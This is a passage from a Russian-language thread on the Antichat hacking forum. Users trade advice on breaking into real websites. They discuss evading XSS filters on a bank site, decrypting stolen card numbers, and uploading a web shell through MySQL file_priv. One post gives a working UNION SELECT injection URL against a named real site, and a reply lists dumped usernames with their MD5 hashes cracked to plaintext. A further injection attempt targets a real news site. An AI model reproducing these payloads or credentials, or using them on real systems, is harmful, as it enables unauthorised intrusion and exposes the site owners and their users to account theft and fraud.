ANTICHAT — форум по информационной безопасности, OSINT и технологиям

1.Хы,нашёл тут тоже пару xss-ок уже на другом банковском сайте Ж)).Вот думаю,париться или нет - там не дебилы всё же сидят и поймут гг,если просто применить тупо urlencoding.Можно ещё применить какой-либо метод кодирования ? Ибо со скулей ничего не вышло - 4-ая версия(ошибка в mysql_array,выводит только её,и хрен поймёшь,подобрал я имя таблицы правильно или нет).Сайт вообще какая-то дизайнерская студия разрабатывала =_=.Короче воть)

2. На мой вопрос,что делать с зашифрованными номерами кредиток так и не ответили( Напоминаю,что они 16-и значные =_______=),и расшифровать их мне не удастсо,даже если одни циффры там :Р).

3.А также,финальный мой вопрос из разряда *нупских* - Распишу поподробней:

1.Имеется file_priv на одном сайтеге,все пассы зашифрованы там Ж).Есть открытый порт 3306(ну мускул,превед тебе дарагой).Phpmyadmin там нету.

Собственно, очень нужно знать - как залогиниться в бд, расшифровав хеши с mysql ? Какие средства нужно для этого использывать, ибо шелл не залить не зная полного пути и не имея конфигов(,да и кроме етк папи ниче не нащупал.).

ЗЫ: Жду жду ждуууу атветов с нетерпением(только не глупых))))))))) ).

Везёт же людям гг)

Велемир,

1. Что ты хочешь сделать с этими хсс? Впарить какому-нить клиенту? Ну впарь, только тебе это в любом случае мало что даст. Про скулю вообще молчу...

(з.ы. банки не хранят данные о своих клиентах в бд на серве, на котором стоит сайт)

2. Забыть или расшифровывать. (в номере кредитки только цифры)

3. Если file_priv = 1, попробуй залить шелл одним из множества способов. Также если у тебя есть доступ к mysql.user, то можно попробовать расшифровать хэш и залогиница в базу, но стоит это делать при условии что доступ разрешен не только localhost, а это бывает достаточно редко

Возможли ли как-то реализовать хсску, если фильтр намертво отрезает все, что в <> и их самих тоже. варианты типа <<><><<<>as<a>><<sa>> пробовал, тупо ищет отрывающуюся закрывающуюся кавычки и стирает.
" преобразует в &quot; разрешены теги <b> <i> <li>, это не форум.

Если там не тоит

<meta http-equiv="Content-Type" content="text/html; charset=кодировка>

можно попробовть сделать это через юникод

например как тут

http://forum.antichat.ru/showpost.php?p=658326&postcount=16

Помогите плииз.
matriza@localhost
matriza_wrxvlad
5.0.27-standard-log
Получил структуру базы данных через INFORMATION_SCHEMA.TABLES, но не могу вывести информацию из самой базы.
*16: userlist
16.1: name
16.2: pass

http://www.wrx-vladivostok.ru/news.php?id=1+UNION+SELECT+concat_ws(CHAR(45),%60n ame%60,pass),2,3+FROM+matriza.userlist+LIMIT+2,1/*

user-827ccb0eea8a706c4c34a16891f84e7b
827ccb0eea8a706c4c34a16891f84e7b = 12345

customer1-dc5c7986daef50c1e02ab09b442ee34f
dc5c7986daef50c1e02ab09b442ee34f = 001

большое спасибо, принцип понял

http://stiri.rol.ro/content/view/129717/-3'+group+by+1/*/

а дальше хз че делать..у кого какие предложения?